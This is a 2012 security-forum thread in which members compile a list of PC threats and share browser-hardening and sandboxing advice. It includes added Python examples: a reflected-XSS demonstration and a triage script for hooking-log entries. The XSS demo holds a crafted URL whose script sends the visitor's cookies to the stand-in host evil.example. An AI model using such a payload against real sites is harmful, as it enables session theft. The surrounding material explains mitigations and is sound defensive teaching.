My 1 and only philosophy thought for 2012!

Discussion in 'other firewalls' started by Escalader, Jan 2, 2012.

Thread Status:
Not open for further replies.
  1. DVD+R

    DVD+R Registered Member

    Joined:
    Aug 2, 2006
    Posts:
    1,979
    Location:
    The Antipodes

    Well realistically you could ditch the lot! IF! 1: You never visited anything bogus, and kept to just trusted websites that are less likely to pose a threat, i.e. news sites or sports sites etc. 2: never downloaded anything that was compressed. 3: never opened bogus emails. 4: just used common sense. Then and only then, if you stuck to those rules, you wouldn't need any security at all, but you're not likely to do that, are you? :cautious:
     
  2. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses

    You are 100% correct! Users are unlikely to do as you suggest!


    So parsing your post I find these threats:

    1) visiting bogus web sites
    2) news sites
    3) sports sites
    4) downloading compressed files
    5) lack of common sense

    Is this correct?
     
  3. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Version 2 of our threat list (Impacts not yet there)

    Version 2 of the threat list. Here is an update to the original list:
    1. Drive by o_O??
    2. Virus
    3. Spyware
    4. Existing infected files / Spam
    5. Evil Websites
    6. web surfing
    7. adobe
    8. old java versions
    9. Scripting
    10. Attempts to access your setup by hackers
    11. Loss of private data
    12. Hooking
    13. memory injection
    14. process termination
    15. registry access
    16. screen/clipboard logging
    17. root kits
    18. DNS request by non network enabled applications
    19. Launch network enabled process
    20. Keyboard logging/intercept keystrokes
    21. Human Error in Security Decision(s)
    22. visiting bogus web sites
    23. news sites
    24. sports sites
    25. downloading compressed files
    26. lack of common sense
    27. malware
    28. Tracking of Online Habits.
    29. Unauthorized use of PC, e.g. as part of a botnet
     
  4. Pedersen

    Pedersen Registered Member

    Joined:
    May 4, 2010
    Posts:
    234
    Don't ask if this is too little.

    I use Windows firewall control from Binisoft as my ONLY security application. Nothing else and I am running really great, lite and secure...

    Common sense outmatches any software other than firewalls.
     
  5. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    5,918
    Escalader - I can prevent these numbered issues only if I don't execute them.
    It's impossible to control all of them in any way, so the focus goes away from
    convenient browsing to controlling those processes instead. That's a waste of time and
    energy. If something is fishy, the last way out is a proper backup.

    The target of all attacks is human nature: dullness and greenness, and biggest of all, nosiness
    (if those are the right terms).

    "gimme all news"
    "all is harmless"
    "i want that file"
     
  6. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Have a read of this again from earlier in the thread; you will then remember that this is NOT what was put as a question:

    https://www.wilderssecurity.com/showpost.php?p=1997817&postcount=7
     
  7. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Yes, no problem.

    Please note that nowhere (I hope) did we say ALL threats.

    BUT if we develop a list of say 50 of the most likely/common/dangerous threats and then match those up to our layers and ask "does our layer deal with this type of threat?" then IMHO we have done a reasonable evaluation of our layers. We don't need or want ALL, just a reasonably categorized list as a functional review of our defenses.

    It doesn't matter in this thread what tools inhabit each layer. My tools are not important to the thread only to my setup. The same applies to us all.

    BUT if in the end you find that one of your layers is deficient against a threat well then again in my view that is valuable.

    If thread followers have a different view or security policy that is fine then the thread is useless to them except to say those guys are wasting their time:thumbd:

    None of that matters to me personally I'd be the first guy out of the gate to say yes you have your own view great well done, only it is not my view.

    Okay?
     
  8. Konata Izumi

    Konata Izumi Registered Member

    Joined:
    Nov 23, 2008
    Posts:
    1,557
    add DLL Injection, Persistent Cookies :D

    my way of handling most security threats:

    * Set up my pc to deny execution without my consent.
    * when executing make sure it is sandboxed/contained.
     
  9. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    Escalader,
    Could you qualify the term "secure" a bit? Secure against who or what? For how long? Depending on your potential adversary, what is secure against one is a minor inconvenience to another. All threats is quite vague, especially if that includes "official snooping".
     
  10. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses

    You are right to ask this.

    I've not emphasized that word secure since I think everybody has different views of what "security" is needed for themselves (and sometimes others).

    What is one person's secure method would be a major inconvenience to another user. I'm sure we have all seen signatures that hint at this one:
    "the only safe setup is unplugged from the www". But another guy might say that is wrong, since my PC can be stolen and all my private information lost. In my view (I'm often wrong) both of these are correct.

    So what I'm saying here is a roundabout way of saying that rather than argue or debate the words, I choose to take a "let's identify the threats we face" approach.

    If say I don't see USBs from the teenagers as a threat then that one would be excluded from my "threat" list. You may choose to include it.

    But if you have your list and I have mine then we can both "test" the adequacy of our defences against our own lists. We don't need to agree on the one and only list; in fact that is a bad idea.


    I've probably made it worse with all this:cool:
     
  11. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    I've added them!

    Hold on to your remedies for the moment! (I like both of them!)
     
  12. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    5,918
    Escalader - it's no waste to think about security. But some dudes invest a lot of time in controlling what cannot be controlled. And in the first place this is "your" thread because it starts with "My...": you collect a list of possibilities and I gave you my thoughts. What I actually miss is the conclusion of it - or is that part of another thread? ;) (although there are a lot of threads here concerning vulnerabilities ;)) From my point of view there is a small number of switches to cover most of the (your) list - but if you want all, you have to be a hacker or a pro. I don't have that knowledge - I even was set up with Torchsoft Malware Defender at least because it got annoying. Same for Outpost 7 (all after v5) as an example.

    USB was mentioned - quite easy - turn off all autostart switches and tell Sandboxie or BufferZone to open such drives in the box. Same for unknown software.

    drive-by (browsing) - don't surf such sites - use e.g. WOT.
    But WOT does not cover all, so defeat adverts and popups.
    Those cannot prevent evil combinations of e.g. JavaScript+Java, so disable Java.

    Another switch is LUA.

    And so on.

    Those are elementary for safer working and cover most items on your list. Of course it's annoying to rewind that text again and again, but it has to be. People must be conscious that anti-xyz software is not the holy bible versus malware. Additional software only feigns security; it only covers what is already known, not the new samples, 15000 a day. People need to go back to the roots instead of adding intrusion forks.

    In the last days I had two people again with some problems browsing or system trouble they can't explain. They gave me a HijackThis log and although the symptoms were different, both had the same issue: gamemon.des.exe (file missing).
    This is a trace of a trojan, and the rest of the logfile explained why they got it: they loaded it themselves while using illegal stuff, while Avira and Norton kept silent. Only one story.

    If you feel bored again now... maybe.
     
  13. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses

    Hi B!

    Nope never bored by your stuff!

    TY for giving me a few more threats for the list.

    It must drive you nuts and others the way I work/think but there is no cure for that.

    If it helps at all let me say more clearly I'm aiming for a solid sample of threats for the list. Say 50 or so.

    Then I'll post a table where I try to categorize these for the thread. I will make errors doing that ( I'm used to flak)

    Then when that is done we will match these up to the conceptual layers.

    At that point the mitigation can start getting added!

    It's like watching grass grow. But I have zero sense of urgency here and I'm NOT peddling tools ever! I have zero loyalty to vendors.
     
  14. wat0114

    wat0114 Guest

    @Escalader,

    I recommend, if you haven't already, check out several posts/threads by Wilders member Rmus. He continually - and correctly - asserts the importance of hardening the browser, because this is, after all, the main "gateway" for all exploits and threats. If you stop the threat at the browser, you stop it from gaining any kind of foothold in the O/S.

    You have listed numerous threats, which is fine, but some are too generalized. Probably two of the main web-based threats are Cross Site Scripting and Drive-by Downloads. There may be others, but from what I've researched so far, these two seem to be amongst the most serious because stopping them outright isn't necessarily completely in the hands of the user.

    From what I've found so far:

    Five ways to reduce the chances of an XSS attack on the client-side:
    • Disable scripting when it is not required – Possible browser choices: Firefox w/NoScript or IE 8/9 (has built-in XSS filtering)
    • Do not trust links to other sites on e-mail or message boards: They may contain malicious code with damaging potential.
    • Do not follow links from sites that lead to security-sensitive pages involving personal or business information unless you specifically trust them.
    • Access any site involving sensitive information directly through its address and not through any third-party sites.
    • Get a list of attacks and the sites and boards they happened on and be careful if you need to visit one of them.
    Drive-by Download Protection:
    • Keep all software updated
    • Minimize attack surface: uninstall software and add-ons that are not used and/or not necessary. This will reduce the attack surface and simplify the amount of software you need to keep up to date on your systems. Disable unneeded software that can’t be uninstalled.
    • Newer software is better: the data suggests attackers are more successful when targeting older platforms, Web browsers and document parsers. Where possible use the most recent versions of operating systems, browsers, document parsers, etc.
    • Use caution surfing: be selective about what Web sites you decide to connect to, and restrict the sites that corporate assets can connect to. Avoid surfing the Internet while logged onto systems as an Administrator – use accounts that have limited privileges like a standard user account.
    • Careful who you talk to online: be selective about the emails you open, the instant messages you interact with and the URLs you click on.
    • Use anti-malware software: run anti-malware software from a trusted vendor and keep it up to date. – Optional (IMO): I prefer on-demand antivirus only, but this is of course a user's preference
    • Use web browser and search protections: leverage the protection technologies that are available in modern Web browsers and search engines. For example, the SmartScreen Filter built into Internet Explorer helps protect against sites known to distribute malware by blocking navigation to malicious sites or downloads. Anti-malware protection helps prevent the download of harmful software. Internet Explorer 8 added per-site ActiveX controls, which allowed users to restrict an ActiveX plug-in to one particular domain. Internet Explorer 9 introduces ActiveX Filtering, which provides users with more control over which sites can use ActiveX controls; when ActiveX Filtering is enabled, only sites that are trusted by users can run ActiveX controls. This feature reduces the attack surface by restricting the ability to run ActiveX components to trusted sites. Users can allow specific sites to run ActiveX controls through an icon in the address bar. IT administrators can also enable ActiveX Filtering via Group Policy to prevent users from downloading ActiveX controls from the Internet Zone.

    Some alternative browser choices:
    • Firefox: Used with NoScript can provide powerful protection against web-based exploits
    • Chrome: Safe Browsing, Sandboxing, Auto-updates
    • Opera: Fraud and Malware Protection, Encryption, Private Tabs

    The above information has been obtained and in some cases edited from the following sources:

    -http://www.ibm.com/developerworks/web/library/wa-secxss/
    -http://blogs.technet.com/b/security/archive/2011/12/12/what-you-should-know-about-drive-by-download-attacks-part-2.aspx
    -http://www.google.co.uk/chrome/intl/en/more/security.html
    -http://www.opera.com/security/
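    The post above says that stopping XSS "isn't necessarily completely in the hands of the user", and lists disabling scripting (NoScript, IE's filter) as the client-side mitigation. The following is an added example, not code from the post or from any of the sources it cites, that shows both halves of that statement on one constructed page: a search page that reflects its "q" parameter unescaped (the server's bug), the server-side fix (HTML-encoding the reflected value), and a crude NoScript-style client filter that drops script elements and on* handler attributes from the received HTML. The hostnames shop.example and evil.example, the payload and the page template are all constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link (hypothetical hosts): the "q" parameter carries a
# script payload that a reflecting search page would echo back into its HTML.
MALICIOUS_URL = (
    "https://shop.example/search?q="
    "%3Cscript%3Edocument.location%3D%27https%3A//evil.example/%3F%27"
    "%2Bdocument.cookie%3C/script%3E"
)


def query_from_url(url):
    """Return the decoded 'q' parameter of a search URL ('' if absent)."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_search_vulnerable(query):
    """Server bug: the query is written into the page as raw markup (reflected XSS)."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query):
    """Server-side fix: HTML-encode the query so it can only ever be text."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def has_script_tag(page):
    """True if the page still carries an executable <script> element."""
    return "<script" in page.lower()


class ScriptBlocker(HTMLParser):
    """Crude client-side blocker: drops <script> elements (tag and body) and
    on* event-handler attributes, modelling what a NoScript-style add-on does
    for a site the user has not explicitly trusted. Illustrative only."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.in_script = 0

    def _attrs(self, attrs):
        kept = [(k, v) for k, v in attrs if not k.lower().startswith("on")]
        return "".join(f' {k}="{html.escape(v or "", quote=True)}"' for k, v in kept)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script += 1      # suppress everything until </script>
            return
        self.out.append(f"<{tag}{self._attrs(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        if tag != "script":
            self.out.append(f"<{tag}{self._attrs(attrs)}/>")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = max(0, self.in_script - 1)
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_script:       # script bodies are never copied through
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def block_scripts(page):
    """Run the client-side blocker over a page and return the stripped HTML."""
    parser = ScriptBlocker()
    parser.feed(page)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    q = query_from_url(MALICIOUS_URL)
    print("vulnerable :", render_search_vulnerable(q))
    print("server fix :", render_search_safe(q))
    print("client fix :", block_scripts(render_search_vulnerable(q)))
```

    The vulnerable renderer hands the attacker's script to the browser verbatim; only the site operator can apply the encoding fix, which is why the post says the user does not fully control the outcome. The client filter is the user's fallback: it removes the script before anything runs, at the cost of breaking every legitimate script on the page, which is exactly the trade-off NoScript users accept per site.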
     
  15. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    5,918
    @wat - thx for pointing out the advantages of IE8 & 9.
    I'm still on IE8 but it has only LAN access - and other computers won't let him in if not allowed ;)

    @Escalader
    Not really - you don't waste my time, nor am I surprised or worried.
    From time to time I feel this way and I think here is the right audience for it ;)

    I like your list, really - it reminds me of my beginning and still-learning way with security.
    My nearest friends have adopted some of my thoughts and they drive really
    well with them. So that's some kind of satisfaction ;)

    Please go further.
     
  16. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses

    Hello:

    Thanks very much! For each of the mitigations you have provided there are threats either directly listed or implied!

    My list needs some parsing, I know that. Some are general as you say, others need clarification.

    I really appreciate it!
     
  17. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses

    Okay I am proceeding on. I need all the help I can get.
     
  18. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Hello Thread:

    Here is my first stab at some classification columns for our evolving threat list.

    1. Type,
    2. Threat,
    3. Threat Methods/ Cause,
    4. Examples,
    5. Potential Impacts,
    6. Mitigation (layers)

    Let me know what you all recommend for the classifications:D
     
  19. Escalader

    Escalader Registered Member

    Joined:
    Dec 12, 2005
    Posts:
    3,710
    Location:
    Land of the Mooses
    Hello Thread!

    Okay, good: since 3 days ago, about 150 or so reads/views of the Version 1 classification system for threats.

    So for now I'll assume that most of you guys/gals are willing to try those for now.

    Here is a small question for you:

    Are the following ALLOWED HOOKING events (from log entries from my Firewall) threats I have failed to manage?

    1. IEXPLORE.EXE Window hooking c:\windows\system32\mshtml.dll
    2. IDENTITIES.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
    3. FOXIT UPDATER.EXE Window hooking c:\windows\syswow64\msctf.dll
    4. IEXPLORE.EXE Window hooking c:\windows\system32\dwmapi.dll
    5. EXPLORER.EXE Window hooking c:\program files (x86)\keyscrambler\x64\keyscramblerie.dll
    6. KEYSCRAMBLER.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
    7. LOGONUI.EXE Window hooking c:\windows\system32\msctf.dll
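    The question above is whether the seven allowed "Window hooking" log entries are threats that slipped through. A first-pass triage of such entries can be done mechanically: parse each line into the hooking process and the DLL it loads, then sort the DLL by where it lives on disk. The script below is an added example, not the poster's or the firewall vendor's code. It assumes each line means "process X installed a window hook using DLL Y", as the log text says, and uses location-based heuristics that are assumptions of this example, not rules: a DLL in the Windows system directories is treated as an OS component, a DLL under Program Files as installed software to verify against the vendor, a system DLL name loaded from somewhere else as a masquerade, and anything in a user-writable location as needing review. The seven lines are copied from the post; the NOTEPAD.EXE line and the second EXPLORER.EXE line are constructed to show what a suspicious entry would look like, with hypothetical paths.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample log: the seven lines quoted in the post, plus two made-up
# lines (NOTEPAD.EXE and the second EXPLORER.EXE) with hypothetical paths that
# stand in for the kind of entry a practitioner would want flagged.
SAMPLE_LOG = r"""
IEXPLORE.EXE Window hooking c:\windows\system32\mshtml.dll
IDENTITIES.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
FOXIT UPDATER.EXE Window hooking c:\windows\syswow64\msctf.dll
IEXPLORE.EXE Window hooking c:\windows\system32\dwmapi.dll
EXPLORER.EXE Window hooking c:\program files (x86)\keyscrambler\x64\keyscramblerie.dll
KEYSCRAMBLER.EXE Window hooking c:\program files (x86)\keyscrambler\keyscramblerie.dll
LOGONUI.EXE Window hooking c:\windows\system32\msctf.dll
NOTEPAD.EXE Window hooking c:\users\bob\appdata\local\temp\hook32.dll
EXPLORER.EXE Window hooking c:\users\bob\appdata\roaming\dwmapi.dll
"""

# "<process>.exe Window hooking <dll path>"; process names may contain spaces.
LINE_RE = re.compile(
    r"^(?P<process>.+?\.exe)\s+Window hooking\s+(?P<dll>.+?)\s*$", re.IGNORECASE
)

# Heuristic location classes (assumptions of this example, not firewall rules).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
PROGRAM_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
# DLL names that belong in the system directories, taken from the log itself.
OS_DLL_NAMES = {"mshtml.dll", "msctf.dll", "dwmapi.dll"}


def classify_hook(dll_path):
    """Return a verdict for the DLL a window hook was installed with."""
    p = dll_path.lower()
    name = PureWindowsPath(p).name
    if p.startswith(SYSTEM_DIRS):
        return "os-component"
    if name in OS_DLL_NAMES:
        return "masquerade"          # system DLL name, non-system location
    if p.startswith(PROGRAM_DIRS):
        return "installed-software"  # plausible; still verify the vendor
    if any(marker in p for marker in USER_WRITABLE):
        return "review"              # user-writable path: malware's usual home
    return "unknown"


def parse_log(text):
    """Turn 'Window hooking' log lines into dicts with a verdict attached."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                 # skip blank or unrelated lines
        proc, dll = m.group("process"), m.group("dll")
        events.append({"process": proc, "dll": dll, "verdict": classify_hook(dll)})
    return events


def needs_review(events):
    """Entries a practitioner should look at by hand."""
    return [e for e in events if e["verdict"] in ("masquerade", "review", "unknown")]


if __name__ == "__main__":
    for e in parse_log(SAMPLE_LOG):
        print(f"{e['verdict']:<19} {e['process']:<18} {e['dll']}")
    print("to review:", [e["process"] for e in needs_review(parse_log(SAMPLE_LOG))])
```

    On the seven real lines this yields only "os-component" and "installed-software" verdicts; the two constructed lines are the ones that come back for review. A benign location is not proof of safety (a keylogger installed into Program Files would pass this filter), so the next step for anything under Program Files is checking the file's digital signature and that the product is one you actually installed.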
     